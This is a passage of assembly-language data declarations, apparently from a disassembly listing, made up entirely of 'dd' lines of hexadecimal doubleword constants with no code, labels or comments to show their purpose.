dd 60A6C66Fh, 6FB7B732h, 24904FFCh, 1D8D93D6h, 0F77B8E95h
dd 5EE4CF10h, 0EBD17AF0h, 66528288h, 0EB35C0Fh, 855A5727h
dd 0D0EFE85Fh, 8A49CFD3h, 32B241D7h, 26768DAFh, 9A016A88h
dd 4498B8E9h, 8832DA0Fh, 0ABE10791h, 95AE73A4h, 0E7734855h
dd 4FF352DAh, 71AF0A09h, 0E64894Ah, 0DB36AEh, 36ABA8BCh
dd 831821B2h, 930B5844h, 68C79542h, 1131D240h, 6AFF53C5h
dd 0EB48FC86h, 4A88958Dh, 0EFA57E79h, 0F8E1A9DDh, 0B233EEBBh
dd 0C5235C9Eh, 6B8F6467h, 4AC0E4A9h, 5CDCAB9Dh, 0DE4319BCh
dd 2BBCA0DEh, 4C32992Fh, 8C5E9949h, 11A1C66Fh, 0F0AD8763h
dd 0AC5EBECAh, 8EEF8E5Ah, 277534D4h, 0A372EA86h, 0E576544Ah
dd 1BFC80BEh, 4F96B617h, 6D11309h, 0F9E5BE13h, 46D18147h
dd 212A3DE1h, 1F8B04E6h, 567BE586h, 0B5977373h, 7A3E8F70h
dd 6173E1F8h, 6B2C6F08h, 42F20410h, 33FD7B81h, 0CB01EDE5h
dd 0DFBC3DF3h, 77405488h, 9A2B4E86h, 4BB58658h, 72AEBD13h
dd 9D8F583Ch, 0C3B8DCE6h, 61DD1A13h, 5450DBFAh, 7F88DBFCh
dd 761C5051h, 84FA83C2h, 6DCC785h, 0AB071EF7h, 96CFAD86h
dd 4071079Ah, 7D5EA2C2h, 282AF56h, 0BCD4C5FFh, 0E1EBBE9Eh
dd 0F31B369Fh, 287436F5h, 0C40B3D7Dh, 0BF901874h, 0AA780DB7h
dd 3AEF604Bh, 0C1FC2E3Bh, 53E00C2Dh, 9D0D9854h, 0B9737C62h
dd 7121A667h, 4CFAC023h, 2ECF251Ah, 8B9F8A6Ch, 0D011C8BFh
dd 80C99F60h, 3595DD1Bh, 0B1DCDE13h, 8F3311C6h, 0B3321670h
dd 0DBEDFF7Bh, 0E4C2D5B5h, 0EED2A221h, 0A0B9FA2Eh, 10718152h
dd 0FF0682A4h, 0BFF5EFC2h, 1E9E783Fh, 454C65DEh, 0C9D0DB2Bh
dd 9DED15C5h, 247E44BAh, 38F2B51Dh, 8DCC1651h, 37C7989Ah
dd 47A11367h, 0EE14D5D5h, 14CC49A2h, 7841EEA2h, 0FA24C1FCh
dd 0A8BA86B9h, 63931E6Ah, 0FCE1D9E3h, 0FACA4E4Ah, 2AC83000h
dd 7B69291Eh, 91123B9Eh, 227B38DFh, 0E79592C8h, 4FA05D34h
dd 0A803895Eh, 770C7053h, 8515A67Dh, 86CEEC3Ch, 522E282Ah
dd 976578C5h, 177DE398h, 1039B78Ah, 0D6354D0Bh, 0CE3E8FD8h
dd 5B841AB8h, 0F5615894h, 6333F8B6h, 0E79C84E3h, 53B2EEDAh
dd 0FA29DE8Dh, 6298C091h, 0A0D1BA78h, 0A9392295h, 5EED39B3h
dd 127D1118h, 0D60ECA68h, 1D2DBD47h, 0CB69A0B5h, 21A91874h
dd 8795CC42h, 9FA0463Eh, 0EEDB8F6Dh, 0EBC433A8h, 9053656Ch
dd 0AB14769Fh, 5CD03EDEh, 0B6790912h, 6A56FD0Eh, 35844410h
dd 6C246A31h, 822B9B80h, 67A1F97Ch, 27782F4Bh, 0D08BF8ABh
dd 0F17B10A4h, 191176CCh, 92F554B2h, 0A788158Eh, 0C4D729A2h
dd 55D87A38h, 459272ABh, 44A81F9Dh, 45B8EF99h, 7F597E0Ah
dd 0C5BFCBAEh, 5BA28709h, 0C3FCF99Ch, 0A8CAD503h, 8FBAC4BCh
dd 99754792h, 5C78B9B8h, 0E9C1966Eh, 0DDFA19EAh, 0A14FC1E1h
dd 0A791EA3Ah, 55829C01h, 8F53A806h, 0EA4C0E7Eh, 0EC202FD1h
dd 5DC1AEF5h, 8AF9F8BBh, 0FB53F01Bh, 53013F41h, 0FF86D95Eh
dd 1A90D2C4h, 0DA024402h, 0E1640F3Bh, 0C7930F60h, 906678Bh
dd 57671567h, 0B39D21C7h, 0F4A5EC44h, 0EBC16C3h, 952938C9h
dd 329FDC18h, 69457DB3h, 0F37E571Fh, 72195678h, 7138274h
dd 0D06C7FCAh, 0ED697A77h, 67F3A56Dh, 0B9300D1Fh, 4F007970h
dd 7FE1043Fh, 0BD3D47Eh, 94C24308h, 838B98EAh, 3A55D8C7h
dd 0D05C4E4Eh, 0C95E7CB3h, 4506CB71h, 3ED0E308h, 47C239A5h
dd 2E912B69h, 89C26C85h, 32ECA7A0h, 0BFDC3CD3h, 95B1ABBBh
dd 9FE7645Eh, 0CE8B13DCh, 3393710Dh, 141A1256h, 6B67202Eh
dd 0F03415D2h, 0E76E7898h, 0EA673418h, 1682A7E3h, 3004E984h
dd 1D701017h, 7DF5CAADh, 0E0E0A7D5h, 29614937h, 5A9B25D4h
dd 0C2E2DDACh, 0D9A9122Bh, 8E276E91h, 0B48157F4h, 15D803A2h
dd 0F82338FBh, 0D0DF52B3h, 30AC9BBEh, 902C5E46h, 8AB2DEBBh
dd 0AAF32F4Bh, 0B210DDB0h, 1ECE3235h, 8D823CF9h, 63657E20h
dd 94838A8Dh, 36EE7D18h, 7A39F25Fh, 0CB335078h, 11EA390h
dd 393C9814h, 8C68E72Fh, 33B39243h, 892F63B1h, 269B7648h
dd 0A2BA1E8Fh, 94872300h, 6D12FFADh, 0FD73F9FBh, 0F646E615h
dd 15253524h, 2891521Fh, 0CBDC1330h, 7A1158CEh, 0BADC7C2Eh
dd 0EC42AFBAh, 4F377FC8h, 64EC2B19h, 508AE30Ch, 0A214E3EFh
dd 0A09BFB17h, 3EC52595h, 8BF9EF31h, 86282D2Ch, 0AFC27B44h
dd 741F0E3Bh, 0FE082B60h, 7A7F06FCh, 4BFDBB08h, 0B005C850h
dd 0FF8E16F5h, 0FF6146D3h, 0AD1A99C0h, 2C1ABE26h, 76F4EF57h
dd 0D0E383DDh, 8EDF6482h, 232EBC07h, 13CD096Ch, 43C2F876h
dd 99B467EDh, 0B56146B2h, 3A10652Dh, 38D875C5h, 4F66844Ch
dd 803D36A9h, 0B90309E1h, 0DB8B0348h, 0A2C3D972h, 0B029872Dh
dd 0F2790434h, 8460862Dh, 3185E2D6h, 0CD813CE9h, 0EF82A46Bh
dd 0B869379Dh, 0A95E19F2h, 2FEE8CC1h, 75396360h, 96B54A20h
dd 0AC012C16h, 49E89AAAh, 0B9555FCCh, 0EB5F5B88h, 0CF268B65h
dd 5A2E7044h, 82B413F6h, 0C1C7705Ah, 67D5FD57h, 0F60988B9h
dd 0FED03086h, 157DA8F4h, 6C48D82Fh, 9BB3523Dh, 2A9DD5C4h
dd 66B253FEh, 269193D1h, 923E85B9h, 805AF90Ah, 2AF7D93Dh
dd 0B689E49Fh, 41611BA5h, 0E6689103h, 5E628BBh, 77EAE075h
dd 2A9A0939h, 1D7ED03h, 595DF153h, 0DEF543F2h, 9B33F93Bh
dd 8121907Fh, 0A0EFC5B5h, 9A7E4AD1h, 8135AC44h, 0B91434EFh
dd 326271DDh, 4F4E1E1Ch, 1BC7D8E9h, 0C3BE5E40h, 92283EF4h
dd 0CA9626FAh, 5A6B44ACh, 8C70EBD5h, 191EB310h, 375292BCh
dd 0F5D1148Ch, 1BF76F98h, 9625BCF5h, 7166C2FFh, 5623172Ah
dd 3F4670A7h, 6DA7824Dh, 0DFD513FEh, 3CDC05EDh, 0E9A4D4DEh
dd 0AF728B69h, 273974DAh, 0A53E7F9Fh, 0CA64AEA3h, 0A8138739h
dd 0CB04F88Eh, 171DBF41h, 51B1D225h, 0EFA44D92h, 0E3340FE1h
dd 354D0A26h, 0B88DFFE7h, 0F43160D9h, 0C89F03D0h, 0FEC5671h
dd 2834C3BAh, 4D2446AEh, 74ACC8B9h, 27F3E49Fh, 0CD380FC5h
dd 31D27470h, 25172300h, 0E7544CD6h, 6DC0D528h, 3E859BEDh
dd 45962E95h, 6ED9DF6Bh, 19F62DD6h, 0F3E3D19Dh, 89182328h
dd 0F9165903h, 4D76E090h, 2E414AE9h, 0F320DA43h, 174EA2AAh
dd 0EB9052F2h, 39EA4446h, 7E84F8ADh, 65972130h, 0E30941D1h
dd 0F05A9E18h, 0EE9D1F85h, 0BAB49940h, 35565C8h, 0BA7A659Fh
dd 49F53082h, 30D4E6EFh, 9953B143h, 0D2CE4C49h, 0B56A0653h
dd 0A126DEE1h, 0B14BA8BCh, 0DD4EDC58h, 25454B91h, 0D6955251h
dd 1A01B31Fh, 0CCB2D8F2h, 0EBBDE40h, 9295BAC7h, 8601E6C3h
dd 0A106139h, 0AB92C0D2h, 8F656CC0h, 0E0E06718h, 0AF1191B9h
dd 72673A6Ah, 90A9C76Fh, 3A7A1326h, 0B54EFEADh, 5279D3B7h
dd 3938560Bh, 0F02F8A70h, 89BDBBh, 27F109ADh, 726ECD88h
dd 475F2717h, 273173Ch, 0D3AD276Ah, 0E0994C59h, 1140EE1Ch
dd 6B5FCFFDh, 18A8A9F2h, 324D9695h, 21DD7896h, 1A3955D8h
dd 0A0166452h, 0C4631858h, 600883EBh, 0C7F181D8h, 5FC90091h
dd 0F05B5CC1h, 45DF5F39h
dd 39C9DFACh, 0F2E5817Fh, 25AAF9B5h, 56326884h, 0F84A9D4h
dd 32348532h, 0F468E20Dh, 0E32A71C8h, 0EA560E8Fh, 68380BE9h
dd 562BE080h, 621E4BE3h, 9E91C73Fh, 89D5755h, 0A9278A88h
dd 2AAC3C02h, 57035620h, 73E77F0h, 122CB7FDh, 2918DFB0h
dd 0EF325A1Bh, 0E4CB3C9Dh, 0DDA55BAh, 0F4B8F9F7h, 4E1FB2B7h
dd 7F499D75h, 9C508841h, 48542744h, 0B8C8AF00h, 2A98FBFBh
dd 0F54179B3h, 1143E8E9h, 64A2A15h, 0C7643127h, 234CED12h
dd 6D09D1F0h, 51C682FEh, 0B021A71Ch, 48F9617Ah, 0AD0972A0h
dd 66CEE9E1h, 14D9FD55h, 6B2816DBh, 3E80CEh, 7772C01Bh
dd 81CAD94Bh, 0B5C1AB4Ch, 0CD5910F5h, 28A26D1Dh, 0FFA15819h
dd 3CA8093Fh, 79A2AE40h, 74DE138Ah, 8BE18612h, 3F94A27Bh
dd 3470A285h, 267625BFh, 0D11C75E2h, 0C7ABE328h, 1309380Fh
dd 20EB0A68h, 0F17677BBh, 3A506FF4h, 0EA0139DAh, 0A9DE0A9Bh
dd 0F162284Dh, 74FF712h, 609A6ED2h, 0ECF9BB76h, 34874343h
dd 8A38D6E5h, 1996FDDh, 9B541CE9h, 74BCC1EAh, 0E7611441h
dd 0F7BD8F98h, 0A8BC3988h, 62A48FADh, 99B05680h, 5D5769C4h
dd 9ED0209Ch, 2897D3E8h, 29C4E981h, 0ECC2BA82h, 264BEE1h
dd 0AF1D04Ah, 564C9782h, 2DB8E690h, 9DD40F2Dh, 8ECE34E1h
dd 0F6497FD3h, 0E630E20Dh, 65131E6Dh, 7BA12CF3h, 59EDD37Ah
dd 0B59587CAh, 634B9FB2h, 667271B6h, 6FA1064h, 625F2D6Fh
dd 4CEAEF4Ah, 0B2CC949Ch, 0A2DD3D78h, 891C9F90h, 0B95726CAh
dd 0C366150Eh, 0CEBD3031h, 0F47F1307h, 38400701h, 585C0C05h
dd 577FAF70h, 23FA85F5h, 78B3B84Ah, 8825588Fh, 48609BA4h
dd 0F1962485h, 0C32CEFBCh, 783CF09Eh, 89ED9927h, 1AD10FB3h
dd 521808A3h, 0D1614479h, 4E93F46Ch, 4DC7CAB9h, 0C54F2ED0h
dd 1E0A403Ch, 7476AFCFh, 16E22072h, 3A8567D7h, 70CD0274h
dd 73071EFAh, 0A3F306A8h, 5778C787h, 5ED6BE69h, 7458E715h
dd 5A7327DFh, 0B02F005Eh, 525715B3h, 2EAFCEEAh, 7B5A7F8h
dd 52C1006Eh, 0C3407F68h, 3A34C9BEh, 0E9BFD235h, 0AC93B426h
dd 2F32B235h, 696FA8E9h, 25A30282h, 0F7BCE474h, 295F5C18h
dd 0F1120D13h, 599A94F2h, 0BFB70D9Bh, 0B833FDC5h, 6725339Ah
dd 3A56C0E3h, 6057BBA8h, 0C957DA0Ah, 2577348Bh, 1C41D8Fh
dd 2291A35Ch, 0B3D11B3Bh, 0B760BB04h, 42421289h, 0BE291B9Ah
dd 78D4EA54h, 54C77F12h, 11846C66h, 11267B4Ah, 8598BF82h
dd 0D52B1B8Fh, 0E324CC7Fh, 36C3DF95h, 0EA52313Ch, 0B2EDB8B8h
dd 0FDABE57Ah, 0BDE22D09h, 78F427D0h, 5C76C845h, 70A41E26h
dd 0F0DCBBA8h, 713F2B13h, 1D7713C4h, 3B33FB01h, 184F4E10h
dd 3ABF3035h, 95E5102Eh, 66BD0A9Ah, 0B244CC78h, 57E24F96h
dd 0D629B881h, 0C535C3Ch, 0A4CABC3Dh, 377FC3A7h, 73B7362Bh
dd 1D5BA968h, 8A62FA2Eh, 0D3E1BE38h, 2AADF433h, 35C3FB9Ah
dd 0C210034Dh, 575A436Ch, 0C4F1EA4Dh, 5EC3E13Eh, 23616E80h
dd 0D25750B3h, 0E6225361h, 0D82A3927h, 0C3594B57h, 0D46DFD7Eh
dd 53BB7628h, 0A4FB01E9h, 105814A2h, 2EC32767h, 99DCA699h
dd 0F8483344h, 0DD2E610Dh, 222755F3h, 0B4DEFA78h, 7962C4DDh
dd 0E29AA5A7h, 0CBED6153h, 0D2043065h, 0CC923650h, 0B03FB94Ch
dd 0BC4FEECEh, 0AFA9909Eh, 0E512AA9Bh, 0C593570Ch, 105A11D8h
dd 0C3B3B4E3h, 63C640D6h, 0E60ED295h, 1B54C511h, 0B97B43BAh
dd 6336E345h, 0CF1B5BB5h, 421071E8h, 9654D358h, 0D2A1C9FEh
dd 0C79C1909h, 0AB6E3A73h, 1571E58Bh, 1731084Ah, 60B5957h
dd 0F8FB1DF5h, 0F4E80606h, 588DE265h, 0D1619C43h, 3F62FFF7h
dd 0F213A2FBh, 2B73D17Fh, 0F1768E18h, 0D1AC9DA3h, 2A73C399h
dd 75A9B0F3h, 0A27293E1h, 64A492C1h, 3FBCBE15h, 7EBBD0A0h
dd 8798A7D5h, 2AD7A490h, 0D6CAD2D3h, 1C5B6B1Ah, 657ABE21h
dd 12A2DCB5h, 0A479B5D1h, 0C0932CB2h, 62FBF19Bh, 30A8C2D7h
dd 0DD2ABFB3h, 829C693Fh, 0A948C93h, 0B5567C99h, 4241828Ch
dd 0B81D8B55h, 0A12B0D15h, 0C469C8C7h, 0FC200B61h, 0B93E428Bh
dd 4FAF0B7h, 949587F3h, 7109F1CBh, 7A1F9A55h, 0D12FC73Eh
dd 1AD1C763h, 1D0F5BB1h, 77ED568Fh, 530AF008h, 7927F2F3h
dd 74B5E6D9h, 4B1462E1h, 2CBCB0A8h, 76B72261h, 0B5F64540h
dd 0FAE1C7A2h, 0FC86D386h, 7B476183h, 2F3D6459h, 186C4C61h
dd 2E4D66D1h, 5F7F8E1Fh, 0BE5939D0h, 0C07923Fh, 353DF638h
dd 0B8884A83h, 92F6BBC6h, 0BF68DFB6h, 0DAA2AF9Ah, 14741130h
dd 0AFDCDB3Dh, 4C8122C7h, 58A48A5Eh, 0E25C26DBh, 214E51F7h
dd 0FFD9E9EAh, 831B4162h, 0A8C6A45h, 9E59CB48h, 0FC8985D6h
dd 43694C6Eh, 0D5FDD43Fh, 0B8C54053h, 7EC864EAh, 552F9D4Dh
dd 566A3487h, 0A11DCAF4h, 0BD05FE20h, 5CA455BFh, 9DC9C4B7h
dd 5D903A36h, 953A593Eh, 0A2B9A110h, 0EACCCB40h, 0E5FAD5F4h
dd 24B5832Bh, 7B78CF41h, 9FC966C4h, 0FD56C370h, 4ACF279Ch
dd 0BD0AF6Fh, 0BA686BF5h, 0E878FF3Ch, 85A4DF02h, 26EB7823h
dd 6C582642h, 3CFF8619h, 0E25F8F4h, 0C915A54Bh, 0A46255D0h
dd 3B4BC64Bh, 0C3944D25h, 3677AA3Ah, 6FC80999h, 91DFC925h
dd 8DD1878Bh, 86591912h, 6101049Bh, 8F2EE21Ch, 5964C8Eh
dd 0D83CC811h, 448BFE1Eh, 6CB6E46Ah, 5FEDD875h, 46047EDDh
dd 0D1FC636Bh, 920B80EAh, 862B889Dh, 0E433BE1Fh, 3419969Dh
dd 9C09A517h, 367AA33Bh, 0E016599Bh, 8F1B3D12h, 89F8B841h
dd 0FF081F65h, 2ACBDA33h, 99586EE2h, 89D785F1h, 0E76CD9EDh
dd 9957EFC9h, 5C757AAEh, 98A485D1h, 64EA8D45h, 0DE9CF3D9h
dd 792FB2EAh, 1C51B742h, 4188B817h, 964DD510h, 4EED4415h
dd 753CAD4Eh, 80DD26F1h, 3809304Eh, 2CD89668h, 6D980926h
dd 0EA00EFC1h, 1770612h, 0BB8AE376h, 7EA2F4F6h, 2F542848h
dd 0AE38308h, 4BD88DA3h, 0EE5191AEh, 91A50C1Ah, 6AB1A9C7h
dd 756B72D6h, 0FFB24B11h, 7665EE74h, 90B0CCFAh, 30445143h
dd 0FE7E34D8h, 6E0AD436h, 0DAB3E1A9h, 0D378E2ECh, 6519F5BDh
dd 8A9DBF08h, 0D254D890h, 0F8172FF3h, 0ADEDC783h, 43524E91h
dd 0D0059B9Ch, 730EAB1Eh, 340566A1h, 7F3B1A5Ch, 0E309433Bh
dd 18587D22h, 1F52176h, 298B4274h, 18C29105h, 1E7BFB25h
dd 6091CCDCh, 0C0672AF3h, 0A96FAD61h, 82B01F7Eh, 0F523153h
dd 0F7CD6D5Ch, 388ADFDDh, 0C504FFCCh, 0A09702A7h, 0D11B7C4Ch
dd 9C24AC26h, 2DDDA0FAh, 0C236709Fh, 36554910h, 0D89DB0D7h
dd 65C1F78Eh, 12E9D941h, 69B5F425h, 12919820h, 9B961BEEh
dd 2E0613Bh, 0D553F811h, 1C17CC7Dh, 0B4FFDD37h, 6EE8437h
dd 8D3F3C72h, 162BFB0Dh, 0BFD46104h, 9F52334Ch, 50940917h
dd 6D8987A0h, 0F9435CBEh, 0EEAB9F39h, 0DAA85380h, 0E7BE729Dh
dd 579C04A3h, 3D5B68D1h, 0BEAF8B0h, 203D4770h, 0EDF5A3BDh
dd 7BF4D5C9h, 521322FFh, 1324F5EDh, 27D408ECh, 7D5E4BABh
dd 3CF856A4h, 650E6F13h, 6C60E233h, 0C23624Eh, 74AEFA74h
dd 0B74E62A7h, 63100E43h, 90302D90h, 0E3E39FF3h, 6AC3D0C4h
dd 558ACD2Dh, 0B9162218h, 0D18B7B4Dh, 0D35A7AD4h, 0C77C9B3Fh
dd 9D985A6Bh, 49B1577Bh, 7F44DACBh, 3E88665Eh, 0F3B7F428h
dd 0ABF06918h, 0F11536D1h, 940C06A0h, 0BBDF82Dh, 630F2A67h
dd 570B577Dh, 1DDB8C98h, 0FD3C6A42h, 0F23FDC6h, 34A4E9DCh
dd 0AB871666h, 928B10B4h, 497E16FBh, 210CFE53h, 0D1410661h
dd 4512258h, 809145ECh
dd 0A5E07016h, 0C051D999h, 0E7860B58h, 0BDCAE3A8h, 0A4C4EE60h
dd 6F96B63Ah, 0ED1D10CBh, 51083CA1h, 0AE61207Bh, 76D46A1Dh
dd 0BFBBB6FBh, 0C2962322h, 0EF1E5E86h, 0AAC9D581h, 0CD6E2F49h
dd 2D8F8AC0h, 0B2533183h, 0BCD35F7Bh, 25814B00h, 9A726DE5h
dd 70E17CEh, 0C42C9B51h, 0E48754A3h, 4AA52368h, 0B0B3F506h
dd 0CA0E5FE2h, 8A9D2838h, 60784928h, 9901C10Eh, 0F51F2D94h
dd 0FDF66B6Ch, 964CFE8h, 921FADF1h, 0B2231AE3h, 0BDE2B342h
dd 88FF1B2Fh, 0FA354622h, 0DBCE6E2Dh, 44D02C33h, 15E87D60h
dd 662AA707h, 1E616188h, 0B2F3B725h, 0EE34D32Ch, 0EC09FB8Dh
dd 1051236Fh, 87E322CEh, 0A5C95966h, 84AFE1AEh, 0D152D9C1h
dd 0DA90C20h, 1872BAC6h, 0AA33329Dh, 0B9474843h, 5A562F7Bh
dd 0A63CB2C1h, 0FC9AA136h, 0C15A3874h, 0F7BC347Ah, 2ECA6B43h
dd 8802FEACh, 0D88D9053h, 1CFD071Eh, 7C3478A2h, 0F89A1130h
dd 67B8DE52h, 0B16C11CFh, 97BD0015h, 0C06FE1A0h, 9810ED87h
dd 0ED5FD3ECh, 0B421AF51h, 5CD9007Ah, 2A0A17C9h, 60E61FE7h
dd 206C6316h, 0DBB03691h, 0C960DEh, 0B840B3F6h, 7289692h
dd 0DD7332C7h, 20D3F667h, 200AE05h, 0F6ECE8F2h, 3E8BAD6h
dd 7EA87F5Fh, 1B88ED20h, 0C4834A37h, 0B0D296D2h, 0CD9619EAh
dd 0B4824761h, 2B5A660Ah, 0B08377D2h, 0BF63AA31h, 0EF57CEBh
dd 1CBCA999h, 848385AAh, 903B4096h, 9B108366h, 0EAE31672h
dd 0A4189DFAh, 0ED9D483Ch, 4F56E373h, 0D0598669h, 0E3F5E71Fh
dd 0E3247B01h, 0F7EDCF07h, 0ACAFB298h, 7AE477D8h, 0D4E8C527h
dd 5D58F874h, 0B8EBA83h, 4826DFC7h, 9DAEC43Bh, 42F76F0Eh
dd 714A6FF9h, 0D23ED43Ch, 0B5EC1C95h, 72E25892h, 0C200A539h
dd 3FF604BAh, 2B83DBD4h, 88CC758Ch, 0A4006168h, 6904048Bh
dd 0DBB81FC1h, 8D964DF6h, 2728D58Ch, 0C9F5EE06h, 70A3FC0Bh
dd 6C50A9C4h, 2437CBADh, 12C9ED51h, 1114808Bh, 0F8A31A6Dh
dd 4A467F3Bh, 25883BABh, 3013B37Dh, 0D19AEEDEh, 0DD3D84DAh
dd 875F6748h, 0BC5122F4h, 0F143BEDh, 2315481Fh, 6A362E00h
dd 97EAA45Ah, 1B3CEF11h, 0C8F3670Ah, 0A82C54Bh, 0FAE4A825h
dd 0D5F6D83Bh, 3260C309h, 1EA2AD3Bh, 1C069494h, 2ACE0B6Ah
dd 0F7023729h, 3D1EC45h, 3D0A43B6h, 27D44159h, 60CFBD3Dh
dd 43EDE49Ch, 562AC96Bh, 5C5F02FAh, 621964C7h, 0B4CAE189h
dd 0A8A11A13h, 0C8346E26h, 0DBE59E6Eh, 4AA434A3h, 0F598129h
dd 0B23CC2B1h, 8F147D97h, 0C3056080h, 0B4206917h, 5E46240Ah
dd 8A0A72A2h, 548E4CADh, 1253EE3Ch, 0EB576416h, 26F53A72h
dd 0C3C352F7h, 6C718606h, 4020575h, 67FBCEDEh, 0C8CA883Ch
dd 2E9A02E9h, 3DF40AAFh, 0C5B694E1h, 0AE0C74A4h, 8BA750ACh
dd 45F97151h, 0E6EB7914h, 0FE33EF33h, 0D0ACF04Dh, 7E37AB8Fh
dd 0E8D1545Eh, 0D29C6494h, 66325669h, 495BE387h, 72C1A1A9h
dd 4B137F34h, 9672F1Dh, 0D73F28B0h, 64E1CD89h, 62943D52h
dd 0E38C5C57h, 9A41EB50h, 30B1FB0h, 8B89E729h, 0DEEBE3D3h
dd 825CF442h, 0A60DDC86h, 386E0DA6h, 0E61940D3h, 0B332EBB5h
dd 3B5752CDh, 0EB7B4F14h, 6B02C88Bh, 0FC97841Ch, 0D1BBB9FBh
dd 2BBB81E6h, 8793426Bh, 2D543DD0h, 56573BBCh, 2FF1E26h
dd 435A8494h, 631CEE61h, 0DFA8F77Ch, 3AA36609h, 0F0B8AF16h
dd 5F6520B1h, 0BFE72373h, 20320A1Ch, 0B88B3F9Eh, 54F9AFDCh
dd 0F9A2F7C3h, 0F9E1B50Eh, 0B4779649h, 3F898F39h, 0E3C9ABD7h
dd 0D3FA447Eh, 22DB5FF7h, 580D715Bh, 0F6384BA8h, 1D31F4h
dd 0A2A07993h, 27312A33h, 1281DF23h, 0E03AF71Fh, 0ABDC30CEh
dd 0E3B1E687h, 1C3DE05Eh, 4D62A48h, 0B669CD60h, 5A559E97h
dd 0CEAE0827h, 10CDEB8h, 0C269116h, 5C1EBF14h, 0B7125422h
dd 3F255428h, 0B6620823h, 565FCA7Dh, 92FF05A2h, 0DF97D5BCh
dd 6503E81Fh, 0B7CBA164h, 0AED3286Dh, 0ACA86C05h, 2F65E31Ah
dd 0B622DB95h, 2A514FF1h, 608C1E26h, 57DE64C1h, 8A4E7E45h
dd 116B0D8Dh, 3742C535h, 76E55FCFh, 0E1868E9Dh, 1FA1A570h
dd 7CC0EF6h, 77923C0Dh, 0A7EE43A9h, 71C61DE0h, 6B801AB0h
dd 80A4E2E1h, 3F224DA7h, 0C3CA029Eh, 448B68CDh, 0F998714Dh
dd 107C392Ch, 0C7980FC9h, 71055A24h, 2F274ACh, 0AB69337Ch
dd 55980342h, 2D8E345Ch, 0CE27E39Eh, 1220344Dh, 0B0994983h
dd 474CEDE0h, 7FF933F9h, 0C36DF114h, 0E885E0CBh, 6B575638h
dd 43A4C985h, 2307DB4Eh, 593A695Eh, 0B1A87A41h, 70B08DCAh
dd 97992047h, 94A8BF8Ah, 0D6EC9444h, 7E5BC688h, 0AB05BE91h
dd 6F8DA911h, 0C9077809h, 45CEF076h, 5DE70D36h, 2153B433h
dd 0A4215299h, 0AA18825Eh, 0DCB56D2Eh, 476B80B6h, 0C1E1533Dh
dd 36E7CD51h, 5EE4F627h, 0A63288B8h, 57AB562Eh, 32B1B523h
dd 38D43078h, 7E7D7450h, 987DD521h, 9A7D86C5h, 24A9794Ah
dd 0FBA27A0Ch, 60D862D0h, 5EA7BAF2h, 0E20B8EAEh, 5F59F4F4h
dd 896A3816h, 0B2ADC180h, 0E627F270h, 28A8E469h, 0E3902802h
dd 9741065Fh, 941D6ECDh, 0F4F08B90h, 0EC0356DDh, 6DCB91A8h
dd 1478B280h, 0F0719F2Bh, 2AFB5CCAh, 0BEA05EBDh, 0F7FEDE92h
dd 9A9753B6h, 1F5C7E3Ch, 4ACE13D5h, 90C1A0h, 933125E2h
dd 0F09C746Dh, 37415665h, 25DEA2CFh, 38923DDAh, 52625B0Fh
dd 0A66275C9h, 0B6EC0929h, 620F11FFh, 94FEF1DCh, 246FD80Eh
dd 6D65C329h, 7316408h, 7907FA9Bh, 6B2C21DBh, 0E11D9CB9h
dd 2E570088h, 1A91A8Bh, 665BBD13h, 859DA98Fh, 55EC8035h
dd 0E8BC1D43h, 2D7C85C5h, 0FDF95467h, 85DAF782h, 2968CE0h
dd 83A62D02h, 8A4CDEAFh, 71EE24C5h, 592DE1D7h, 292DFD42h
dd 927DF348h, 642818DEh, 0EB6D631Dh, 0AA063A58h, 4DB0DA24h
dd 0B85F282Fh, 79678071h, 6A74D23h, 17F59BBBh, 40BEE978h
dd 0A59E1587h, 854D2BF4h, 0CBED6D1Eh, 0D081939Fh, 0DC479B1Eh
dd 0D8386FE2h, 1C3B718Ah, 0CE0B9DA5h, 0A63E0475h, 0A849C101h
dd 8916A35Dh, 42D0BD15h, 1F453890h, 41F1CE6Dh, 0A0CB851h
dd 72A09013h, 65CBE57Dh, 29E67027h, 30647819h, 0C8336CBBh
dd 29378BFDh, 0B8CF72B1h, 3808EDCFh, 92318C7Ah, 3D39F0E9h
dd 8F3140B7h, 491C6958h, 41D4E706h, 3D189E9h, 3F6CB3A5h
dd 0B9CD614h, 6869A28Ah, 0C7A187A9h, 0D09E89ABh, 976E010Fh
dd 11DC0C1Dh, 0A4A6D224h, 176D8AA3h, 5604BEB4h, 2127E6D9h
dd 0DE9ABCF7h, 41226998h, 99FF3FA9h, 88E655DDh, 8E527310h
dd 0BFE7D975h, 54EF4815h, 0A3987C27h, 6D08C4BAh, 0F4787984h
dd 194F8291h, 0DDEE1B45h, 7E346B41h, 0DAE70812h, 0C1D177DCh
dd 62BFE0B1h, 3AF37BD8h, 0CDBF42E9h, 0D175A409h, 9D14501Eh
dd 0C4FEFE9h, 0E5D7974h, 0BC75F7E6h, 941DE76Fh, 5AA23FA0h
dd 0CEB8B9F7h, 0D6F6525Ch, 0AD1631D0h, 16D2D1CCh, 20FE6C46h
dd 0B40521Dh, 0E77E9F8Bh, 0F6975Dh, 0E92212Dh, 1F89B0F6h
dd 8F2199F3h, 8A8EBFC0h, 0B02EEE7Ch, 54308D07h, 3F27720Fh
dd 31E8744Eh, 4B0D1B37h, 0A8568DCFh, 5E17673Fh, 6327289Fh
dd 0F2B4ACB3h, 85035F97h, 39C89EC8h, 316A897Ch, 68B4B919h
dd 2B6EF50Ch, 0E33C1838h, 7F9C045Dh, 0F29C736Ch, 39335E47h
dd 774A326Dh, 142184B6h, 9DCE573Bh, 7955A943h, 0ACC41F3Fh
dd 0D3FC74D4h, 2CB1EB5Bh, 0FF06DCADh, 7EDC4370h, 92B539D9h
dd 9B7C3F4Bh, 4B67710Ch, 449733F8h, 3746CA53h, 357B7CFAh
dd 2A314C74h, 8E274A14h
dd 0C3423E33h, 3E123FA3h, 0EE301DBCh, 2F3EA6FFh, 82F4A90Ch
dd 87C8F4E3h, 1B49AA36h, 0D092A589h, 7B49EEEDh, 28D9EBCCh
dd 4214E1FCh, 7FD19239h, 0D1D5C2EAh, 0BA57806Fh, 9E4203D7h
dd 0F33CE8DFh, 0F1E8E631h, 0C8570AA3h, 19CA34B5h, 0A7B104BBh
dd 2383865Bh, 0D141A8EAh, 9BE7FDD9h, 99C9AE08h, 72D5B855h
dd 9A603340h, 0A9A1AB0Eh, 0B7B72C01h, 0C81D7BE8h, 0D842C402h
dd 974F3C18h, 605284ECh, 0A582352Dh, 0FC451F68h, 0FBFEC9BFh
dd 0A012DAD0h, 9D86DA3Ah, 0DBB7E487h, 9C895F47h, 645782A5h
dd 32FAC0E5h, 0D87914A5h, 0A8EBAA43h, 0F8C7966Ch, 0D973CA7Dh
